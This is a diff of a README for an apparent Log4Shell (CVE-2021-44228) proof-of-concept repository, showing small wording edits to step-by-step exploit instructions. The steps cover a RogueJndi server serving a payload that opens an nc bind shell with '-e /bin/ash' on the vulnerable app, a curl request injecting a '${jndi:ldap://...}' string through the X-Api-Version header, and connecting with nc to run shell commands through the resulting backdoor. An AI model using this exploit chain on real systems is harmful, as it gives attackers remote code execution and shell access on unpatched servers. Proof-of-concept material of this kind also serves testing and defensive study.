druminik/log4shell-poc/README.md

 java -jar target/RogueJndi-1.1.jar -c "nc -vv -l -p 3001 -e /bin/ash"
 ```

-Start the remote nc server on the vulnerable app
+Start the remote nc server on the vulnerable app.
+Run the following command in a new console

 ```bash
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/o=reference}'
 ```

-Login with nc
+In a new console login with nc

 ```bash
 nc -v localhost 3001
 ```

-Run some commands
+Test the backdoor by executing some linux shell commands and have fun

 ```
 ls